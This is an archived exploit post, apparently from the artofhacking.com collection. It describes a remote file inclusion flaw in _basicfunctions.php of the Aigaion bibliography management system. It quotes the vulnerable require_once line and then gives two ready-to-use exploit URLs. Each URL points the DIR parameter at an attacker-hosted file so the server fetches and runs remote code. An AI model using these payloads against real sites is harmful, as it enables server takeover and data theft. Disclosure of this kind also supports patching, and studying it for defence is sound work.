AOH :: HP Unsorted W :: B06-5709.HTM

Web Interface remote file inclusion



Web Interface remote file inclusion
Web Interface remote file inclusion



Software:Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/ 
script:_basicfunctions.php
author: navairum

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The script _basicfunctions.php does not specify a value for the $DIR variable before including it.
Vulnerable code:

//if this script is not called from within one of the base pages, redirect to frontpage
require_once($DIR."checkBase.php"); 

/* This function leads the browser to the given location */

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit:
http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt? 
http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt? 

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

peace

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.